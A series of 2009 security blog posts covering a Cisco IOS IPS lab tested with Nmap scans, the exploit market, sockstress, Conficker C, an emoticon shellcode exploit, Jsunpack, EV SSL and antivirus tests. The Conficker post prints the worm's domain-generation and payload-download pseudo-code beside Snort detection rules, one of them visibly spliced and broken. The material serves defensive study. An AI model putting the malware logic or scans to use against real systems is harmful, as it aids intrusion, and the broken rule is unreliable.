However, it should be noted that NMap does not give accurate results on determining the OS. Now for instance, choose the first signature of the log (2004) and define the action “denyAttacker”.

Look at the following results from a router after the new action has been defined:

As we can see that NMap cannot detect any open but instead report them as filtered.

/*---ESPAÑOL---*/

Cuando se hace una implementación de un sistema en una red, siempre se deben hacer pruebas (seguridad, rendimiento, etc.) antes de que un atacante las haga por nosotros. El objetivo de este artículo es hacer una pequeña introducción a una de las pruebas que se deben realizar antes de poner en producción el sistema que estamos implementando.

Para sacarle provecho a los Routers Cisco, se va a implementar la solución que traen varios modelos la cual es Cisco IOS Intrusion Prevention System (IPS).

Según Cisco, un IPS es un sistema en línea con características de inspección de paquete profundo, que efectivamente mitiga un gran rango de ataques de red.

Las plataformas que soportan esta característica son:
Familia 800: 871, 876, 877, 878, 881, 887, 888
Familia 1800: 1801, 1802, 1803, 1811, 1812, 1841, 1861
Familia 2800: 2801, 2811, 2821, 2851
Familia 3800: 3825,3845
Familia SR520: SR520
Familia 7200: 7204VXR, 7206VXR
Familia 7301: 7301

Nota: A partir del pasado mes de Mayo del año 2008 Cisco recomienda actualizar las plataformas a una versión del IOS 12.4(11)T2 o posterior, para que sea compatible con el nuevo sistema de firmas 5.x.

Si desean la actualización de firmas hay que dirigirse al link: http://www.cisco.com/pcgi-bin/tablebuild.pl/ios-v5sigup (requiere CCO login).

Para aquellos administradores que están empezando en el mundo de Cisco Security, he visto que a muchos les gusta usar la herramienta Security Device Manager (SDM), y creo que si es la primera vez que vamos a implementar esta solución es mejor hacerlo con dicha herramienta para que no existan confusiones al tratar de implementarla vía CLI.
Como la audiencia de este artículo es de administradores de red con conocimientos básicos de redes, protocolo TCP/IP, CCNA Security o equivalentes; me saltare la parte de cómo instalar el SDM y la configuración del router, en caso de que la necesiten, no duden en enviarme un e-mail y con gusto les envío la guía.

Este es el escenario:

Como se está en un ambiente de laboratorio, imaginemos que el segmento 192.168.100.0/24 es un segmento publico de internet.

Con Backtrack realizamos un scan a la ip pública de nuestro router:

Nmap –PN –O –sV –v –sS 192.168.100.10

Se obtiene un resultado similar a la siguiente imagen:

Observemos el log del IOS IPS:

En el log se aprecia:
1. El número de Firma (Sig) como son: 2004, 3040, 3041, 3042.
2. Muestra el tipo de paquete: ICMP Echo Req (un ping), TCP SYN/FIN, etc.
3. La IP de origen y la de destino.

Usando la opción “decoy –D” del NMap, trataremos de camuflar la ip del atacante con direcciones ip falsas; el IPS mostrara una gama de direcciones como se observa en la siguiente figura:

Si se analiza el log, se observa que nos alerta de los mismos números de firmas de la imagen anterior pero con diferentes ip (entre las cuales se encuentra la del atacante).
Como el log muestra el número de firma, se busca en el SDM y se elije una acción a tomar además de la predeterminada que es: “Alarm”. Para dar un ejemplo elegimos la firma 3040 y añadimos la acción DROP.

Una vez aplicados los cambios, se corre el nmap y observamos el resultado, como muestra la siguiente imagen:

Sin embargo, se debe notar que NMap se le dificulta determinar el O.S.
Ahora para otro ejemplo, se elije la primera firma del log (2004) y tomamos la acción de “denyAttacker”.

Observemos el resultado al realizar un scan al router una vez aplicada la nueva acción:

Se aprecia como el nmap no puede detectar los puertos abiertos y muestra que los puertos scaneados están siendo filtrados.

A Vulnerability Research to the Real World's Exploit Market

2009-04-25T19:09:00.011-04:30

A software vulnerability is always count as an after math on vendor supplied application. Although, if the proper security controls have been in place before the delivery of the actual software then it might have less chance of any common security defect. Recently, number of known organizations have came out to make a bridge between 0-day vulnerability researchers and the software vendors to help reduced the security issues in their applications. At the same time, market has grown more efficienly and in parallel with different security researchers from around the world. Few of those companies who pay to the researchers are:

Zero Day Initiative: http://www.zerodayinitiative.com/ (3Com/TippingPoint division)
iDefense VCP: http://labs.idefense.com/vcp/ (VeriSign's company)
Snosoft: http://www.netragard.com (Netragard's company)
WabiSabiLabi: http://www.wslabi.com

To mention, each of these organizations have their own terms and conditions and payment structure for vulnerabilities and exploit codes. According to the guide, "2007-The Legitimate Vulnerability Market" few most important key issues have been highlighted regarding vulnerability from zero day perspectives.

1. Vulnerability information is time-sensitive commodity
2. No transparency in pricing (there is no public information on any vulnerability types, it depends on different factors)
3. Finding buyers and sellers
4. Checking the buyer
5. Actual value of 0day vulnerbaility cannot be initiated unless the loss is demonstrated
6. Intellectual property rights (how the researcher should feel safe in demonstration without losing its exclusive rights over vulnerability research)

Each vulnerability researched and provided with underline PoC (proof-of-concept) code is passed through number of stages as the one given below, through above third-party legitimate :

Date Action
---- ------
06/05 Vulnerability discovered.
11/7/05 Submitted to prepub review at NSA.
7/27/06 Approved for release by prepub review.
7/27/06 Offered to government.
8/10/06 Verbally agreed to $80,000 conditional deal.
8/11/06 Exploit given for evaluation.
8/25/06 Hash of exploit published.
8/28/06 Agreed to lesser amount
09/8/06 Paid

For several years, security researchers have involved with many types of organizations including Financial institutions, Service providers, OS vendors, Security vendors, Government and Defense operators to help remove any un-discovered security flaws. Taking further highlights from the above article give more clear overview on exploit pricing structure ranging from $4000-250,000.

Map of Science: An outlook of the world of Science

2009-04-16T10:50:00.006-04:30

Click on the image to get full-view.

Re-visiting the End of Internet (SockStress): Meltdown the internet in few seconds

2009-04-15T13:44:00.008-04:30

Few months back, researchers come out with the generic vulnerability held in TCP/IP services. This vulnerability affects almost all systems utilizing TCP stack, including Windows, Linux, Mac and BSD. However, the attack itself is a new breed of denial of service (DoS) attacks. Researchers also put forward the sockstress tool to demonstrate the devastating affects of such vulnerabilities. The full details regarding this threat will come out in June.

The attack can be described as following:

1. Attacker sends TCP-SYN raw packet to the destination port.
2. The target OS respond with SYN/ACK packet as a part of 3-way handshake process.
3. Extracting initial sequence numbers and other information from received packet, attacker now sends the final ACK packet to complete the connection process.

Although, the process looks similar to the 3-way handshake process but remember the packets sent from attacker zone are from userland rather than OS based TCP stack.

More information is available at:
http://www.sockstress.com/

Various Press/Media coverage at:
http://www.grc.com/sn/notes-164.htm

Silence of Storm Worm: Welcome the Rolling Infection of Conficker 'C'

2009-04-03T12:11:00.012-04:30

"Conficker .aka. Conflicker .aka. Downup .aka. Downadup .aka. Kido"

Conficker 'C' variant first strike out on the internet during 20-Nov-2008. As this variant has considerable changes compared to those of 'B'. Approximately, 14.9% similar code found in their process images when disassembled.

The details of these images can be found at:
http://mtc.sri.com/Conficker/addendumC/HMA_Compare_ConfB2_ConfC/

So what makes the difference in variant 'C'? To notice, this new variant of Conficker adds major functionality for P2P co-ordination channel and the revised version of domain generation algorithm (DGA). The main features of Conficker 'C' variant are as follows:

-Capable of incorporating 50,000 randomly generated domain names with the spreading process of 110 TLDs (top-level domains)
-Use of advanced encrytion, digital signatures, and hashing algorithm to protect its zombies from being hijacked. Namely RC4, RSA, and MD6

Conficker.C program logic is give below:

The new hybrid nature of variant 'C' has produced a specifc structure/algorithm for generating more domains in comparison to old 'A' and 'B' classes. The pseudo-code for new DGA is given below:

===========
int domain_name_generation()
{
// local declarations
hMem = 0;
check_if_MS_DEF_PROV();
get_time_from_popular_web_sites();
// baidu.com, google.com, yahoo.com, ask.com, w3.org,
// facebook.com, imageshack.us, rapidshare.com

hMem = GlobalAlloc(0x40u, 0x30D40u); // global array - 50,000 random names
if ( hMem )
{
while ( 1 )
{
counter_domains = counter;
if ( counter >= 50000 )
break;

size_of_name = DGA_random_function() % 6 + 4;
// size of domain name is between 4 and 10 chars
// append "." at the end of the name
random = DGA_random_function();
strcat(domainname, TLD-suffix[random num % 116] );
// append 1 of 116 suffixes (from 110 TLDs) to domain name
++counter;
}

// select and query 500 domains
counter_domains = 0;
while ( !success_download && counter_domains < 500 )
{
// random number modulo 50,000
one_in_50000_names = conficker_D_PRNG_function() % 50,000);
hostent = gethostbyname(one_in_50000_names);
// resolve name to a set of IP addresses
if ( hostent )
{
host_address = hostent->address_list; // get list of IPs
array_previously_checked_IPs[counter_domains] = host_address;

if ( *host_address )
{
// skip if domain name resolves to multiple IP addresses
if ( !*(host_address + 1) )
{
// skip if IP is local host or other trivial IPs
if ( check_IP_value(host_address) )
{
is_blacklisted_ip = check_if_IP_is_in_ranges(host_address);
// skip if IP is blacklisted
if ( ! is_blacklisted_ip )
{
found = 0;
index = 0;
while (index < counter_domains )
{
if (host_address == array_previously_checked_IPs[index] )
{
found = 1;
break; // break if IP has been previously encountered
}
++index;
}
// skip if IP has been previously encountered
if ( !found )
{
snprintf(Dest, 0x80u, "http://%s", host_address);
success_download = download_and_validate_file(Dest);
// HTTP request to the domain and download valid file
}
}
}
}
}
}
Sleep(...); // sleep small random amount
++counter_domains;
}
}
GlobalFree(hMem);
return success_download;
}
===========

Its p2p setup architecture implements the binary download validation, HTTP based date checking through well-known website headers, anti-debugger segments and other logic.

However, there are additional features introduced in this new variant which propogate infection of "millions" of computers world wide putting French and American Air Force, Navy, Hospials, Military networks and even strike out the big giants like Microsoft. For this reason, to step ahead, Microsoft is offering $250,000 to anyone who could report this worm creator. Apart, there are some private firms offering more than $350,000 to half-million US dollars.

The main symptoms of Conficker infection can be inferred from following actions:

1. Account lockout policies being reset automatically.
2. Certain Microsoft Windows services such as Automatic Updates, BITS, Windows Defender, and Error Reporting Services are automatically disabled.
3. Domain controllers respond slowly to client requests.
4. System network gets unusually congested. This can be checked with network traffic chart on Windows Task Manager.
5. On websites related to antivirus software, Windows system updates cannot be accessed.
6. Launches a brute force attack against administrator passwords to help it spread through ADMIN$ shares, making choice of sensible passwords advisable.
7. Port 445/TCP scanning (A/B)
8. Multicast UPnP requests
9. High-port TCP and UDP P2P Activity
10.Up to 500 DNS lookups/HTTP GET request across 110 TLDs per day (C variant)
11.Removal of all System Restore Points
12.High-port (pseudo random) TCP and UDP P2P activity

Detection Mechanisms:

1. Network Detection Signatures

Snort Signature for A/B shellcodes (presented at Honeynet Project)
alert tcp any any -> $HOME_NET 445 (msg: "conficker.a shellcode"; content: "|e8 ff ff ff ff c1|^|8d|N|10 80|1|c4|Af|81|9EPu|f5 ae c6 9d a0|O|85 ea|O|84 c8|O|84 d8|O|c4|O|9c cc|IrX|c4 c4 c4|,|ed c4 c4 c4 94|& 67.15.94.80 $HTTP_PORTS (msg:"ET CURRENT_EVENTS Possible Downadup/Conficker-A Worm Activity"; flow:to_server,established; uricontent:"/GeoIP.dat.gz"; classtype:trojan-activity; reference:url,www.microsoft.com/security/portal/Entry.aspx?Name=Worm%3aWin32%2fConficker.A; reference:url,www.f-secure.com/v-descs/worm_w32_downadup_a.shtml; reference:url,doc.emergingthreats.net/bin/view/Main/2008802; reference:url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/CURRENT_EVENTS/CURRENT_Conficker; sid:2008802; rev:3;)
--
alert tcp $HOME_NET any -> [75.126.138.202,72.249.118.38,208.78.69.70,204.13.249.70,208.78.68.70] $HTTP_PORTS (msg:"ET CURRENT_EVENTS Possible Downadup/Conficker-A Infection Checking Geographical Location"; flow:to_server; classtype:trojan-activity; reference:url,www.microsoft.com/security/portal/Entry.aspx?Name=Worm%3aWin32%2fConficker.A; reference:url,www.f-secure.com/v-descs/worm_w32_downadup_a.shtml; threshold:type both, count 5, seconds 60, track by_src; reference:url,doc.emergingthreats.net/bin/view/Main/2008803; reference:url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/CURRENT_EVENTS/CURRENT_Conficker; sid:2008803; rev:3;)

2. Check your computer for infection (ONLINE)
-http://iv.cs.uni-bonn.de/fileadmin/user_upload/werner/cfdetector/
-http://www.confickerworkinggroup.org/infection_test/cfeyechart.html

3. Removal Tools from various AV companies and security
-http://global.ahnlab.com/global/file_removeal_down.jsp?filename=123718304758%2021&down_filename=v3conficker.zip

-http://download.eset.com/special/EConfickerRemover.exe
-http://data2.kaspersky-labs.com:8080/special/KKiller_v3.4.1.zip
-ftp://ftp.f-secure.com/anti-virus/tools/beta/f-downadup.zip
-http://vil.nai.com/vil/stinger/
-http://www.microsoft.com/downloads/details.aspx?FamilyId=AD724AE0-E72D-4F54-9AB3-75B8EB148356&displaylang=en
-http://www.sophos.com/products/free-tools/conficker-removal-tool.html
-http://www.symantec.com/content/en/us/global/removal_tool/threat_writeups/FixDwndp.exe
-http://www.trendmicro.com/ftp/products/pattern/spyware/fixtool/SysClean-WORM_DOWNAD.zip

More Up-To-Date information of current removal tools at:
http://www.dshield.org/diary.html?storyid=5860

Memory Disinfector
http://iv.cs.uni-bonn.de/uploads/media/memscan_01.zip

Detecting Conficker Files and Registry
http://iv.cs.uni-bonn.de/uploads/media/conficker_names.zip

Nonficker Vaxination Tool
http://iv.cs.uni-bonn.de/uploads/media/nonficker_01.zip

4. Sandbox Detection Results (Conficker C)
-http://mtc.sri.com/Conficker/addendumC/appendix4.html

5. Process Image comparison of Conficker 'B' and 'C'
-http://mtc.sri.com/Conficker/addendumC/HMA_Compare_ConfB2_ConfC/

6. Conficker.C Domain Collisions
-http://iv.cs.uni-bonn.de/uploads/media/c_domains_april2009.zip

7. Domain Generator Filtered Address Ranges
-http://mtc.sri.com/Conficker/addendumC/appendix2.html

Samples of "Conficker" worm are available on special request.

Wide Exploitation of Chatting Applications (A friend's smile or the devil)

2009-04-01T20:49:00.007-04:30

So which IM messenging service you're using today? and that you trust the most?

-AIM/AOL
-ICQ
-MSN
-Yahoo
-GTalk
-Jabber
-Trillian
-Pidgin
-Gaim
-QQ
-Orkut
-Facebook
-Twitter
-Hi5

...and many others.

Recently, the researchers Yoann Guillot and Julien Tinnes has came up to expose the ground reality or the root of massive attacks against instant messaging applications. The threat identified is based on the set of highly animated emoticons or simple smileys. Although, from the dark ages of underground world, this could be the old exploit. The PoC (proof-of-concept) code has been implemented under Ruby on Rails technology and is available at:

http://www.securityfocus.com/archive/1/502327

The potential of this exploit is very high and unacceptable because nearly 95% of internet users use IM applications on day to day basis. Researchers have implemented the encoder above to land any malicious shellcode inside the smiley or animated icon. However, to notice, the current implimentation is limited with the shellcode compliant with MSN based emoticons only. Code can be complied under 'C' with 'metasm' to test the exploit. This has laid a very extensive challenge for the security community to identify the attack patterns in order to protect such threats at IDS/IPS devices.

Happy Rooting...

Jsunpack: Automated JS Unpacker (or Deobfuscator)

2009-03-29T22:28:00.004-04:30

As we have seen the recent growth of HTTP Botnets and DIY toolkits used to drive more sophisticated and targeted attacks to deny, deceive and destroy various network infrastructures and services. There is a famous saying in Chinese as:

"Deceive the sky to cross the ocean"

Today's rapidly growing embedded javascript attacks (e.g. iframe tags) has raised a red flag at the client's browser landing space. Increase in number of encoding and encrypted exploits based on JS include common functions, such as, eval(), document.writeln(), createElement(), setTimeout(), appendChild(), etc. Assuming the IDS/IPS basic functionality with an advanced set of rules and dynamic plug-ins but still today these attacks bypass and evade the network defenses because they require manual inspection of code. Since, doing manual decoding could take an effective time and resources.

This process could involve the use of some debuggers like MS-debugger or Firefox debugger plug-in. On contrast, there could be a malicious adversary who managed to apply advanced techniques to defeat manual decoding such as escape sequences, envrionment variables, timing and black listing.

An example of simple javascript hooking is given below:
----
function func0() {
var abc = new Array;
eval('print (abc);');
}
func0();
----

Prior to Jsunpack, other javascript decoding solutions were:
-jsDecode
-SpiderMonkey
-The Ultimate Deobfuscator
-Malzilla

The main features of Jsunpack are:
-Safe Browser simulation
-Process ActiveX, PDF and Flash contents
-Advanced hooking techniques and evaluate multiple paths
-Can be integrated with IDS/Crawler

SSL vs EVSSL - What's new inside or just a cryptography myth?

2009-03-27T23:46:00.006-04:30

Till the date many online websites (commercial or non-commercial) worked under normal SSL (secure socket layer) certificates. However, as a part of placing secure transactions over the internet these certificates play an important role to any organization's creditibility. Sniffing and decoding against SSL based traffic has got enough disputes that the online merchant services like 'VeriSign' started putting efforts to find stable solution for data encryption and the reliability for highest level of identity and fraud protection from an SSL Certificates. Prior SSL-encryption mechanism worked with RC2,RC4 or IDEA encryption with key sizes ranging from 40 to 128 bits. Is that hard to decrypt? Absolutely not (but also depends on the encryption type).

The main purpose behind introducing the Extended Validation SSL Certificates was to give a new level of trust to the web visitors by providing some sort of proof at user end. Applying EVSSL, give advantage for user to verify the website's identity as the browser address bar will turn green by confirming the site identity and verified it with Certification Authority (CA). On the other side, CA not only validates domain registry but it also checks operational, legal and the company/website's physical existence. As the recent growth of Fast Flux network attack proved that SSL encryption and its validation is crackable which pose a serious loss in faith and confidence for end-users.

According to Anti-Phishing Working Group (APWG), 90% of phishing attacks carried out in December 2006 were perpetrated against financial services companies. The esitmated loss reported was USD$1-billion per year. Handling EVSSL based transactions ensure better protection. The organization deploying EVSSL certificates have to find their suitable CA from CA/Browser Forum (www.cabforum.org). According to Tec Ed report (2007) in which various responses were gathered to show the usage and attitudes toward e-commerce and EVSSL, the results were outstanding. Overall, EVSSL is the best way to ensure that phishers do not wreck a merchant's reputation, and that an end user/consumer doesn't get their sensitive data stolen from them. VeriSign has recently highlighted the views on the best practices of EVSSL just after last month's MiTM attack simulation at BlackHat D.C. The attack was just a twist of existing MiTM attack which fools the users to visit false website. What makes it different from previous MITM attack is the way fraudlent site attempts to leverage falst visual appearance. It simply replaces the site's favicon with the padlock. Although, the method is capable of reproducing the padlock but unable to create a legitimate HTTPS indicator or even the green address bar. Thus, that is where EVSSL got success.

Anti-Virus Solutions: Are they still 'Anti'? or AV is dead?

2009-03-23T21:15:00.006-04:30

As we have seen from the past year when it came out to the public, that all AV solutions are dead. It was a real public fear rather than just a marketing trend. Examining the available market solutions on the basis of practical testing reports given out by AV-Comparitives.org, give us a clear picture of what is still alive or dead in the area of statistical viruses. These tests are conducted on the ground of following areas:

1.Performance Tests
2.Dynamic Tests (proactive/normal conditions analysis)
3.Cleaning Tests (detective solution under infected machines to measure the cleaning capabilities)

However to remind that these tests are not limited and are extended with other considerable factors such as, retrospective detection rate (heuristics and signature based) and statistical analysis without user interaction. Looking into the latest February-2009 Report, following products were tested for speed and false alarm rates.

----
avast! Professional Edition 4.8.135
AVG Anti-Virus 8.0.234
AVIRA AntiVir Premium 8.2.0.374
BitDefender Antivirus 12.0.11.4
Command Anti-Malware 5.0.8
eScan Anti-Virus 10.0.946
ESET NOD32 Anti-Virus 3.0
F-Secure Anti-Virus 9.00.149
G DATA AntiVirus 19.1.0.0
Kaspersky Anti-Virus 8.0.0.506a
Kingsoft Antivirus 2008.11.6.63
McAfee VirusScan Plus 13.3.117
Microsoft Live OneCare 2.5.2900
Norman Antivirus & Anti-Spyware 7.10.02
Sophos Anti-Virus 7.6.4
Symantec Norton Anti-Virus 16.2.0.7
TrustPort Antivirus 2.8.0.3011
----

In the overall test evaluation provided in the report at:
http://www.av-comparatives.org/images/stories/test/ondret/avc_report21.pdf

The test-bench given above is contructed and evaluated on the basis of two sets of tests described in the report itself. However, the most interesting factor to notice is "how many malware samples have been tested"? to detect the static (and partially dynamic) behavior of the next-generation badwares.

Today's highly motivated attackers are more diverted into changing the detectable signature to undetectable and transparent malwares. This can easily be accomplished by applying latest cryptors, protectors and/or packing techniques. Thus, it is still viable to consider these set of AV solutions for static virus detections rather than complex and polymorphic malwares.

Comparing the false alarm rate with the set of malware composition from Test-Bench "A"(April 2006-2008) and Test-Bench "B"(May 2008 - Feb 2009), following outcome has been highlighted:

As we can see, Microsoft won this round, but what could be the reason behind it. On further determination, it can be justifiable that Microsoft has a good stand of Win32 machine learning capabilities in-depth at user/kernel layer. On the other side, no matter whichever AV vendor is trying to protect "at best" their customers from rising malware threats, they have to eat the bits
and pieces under the table before coming into the market.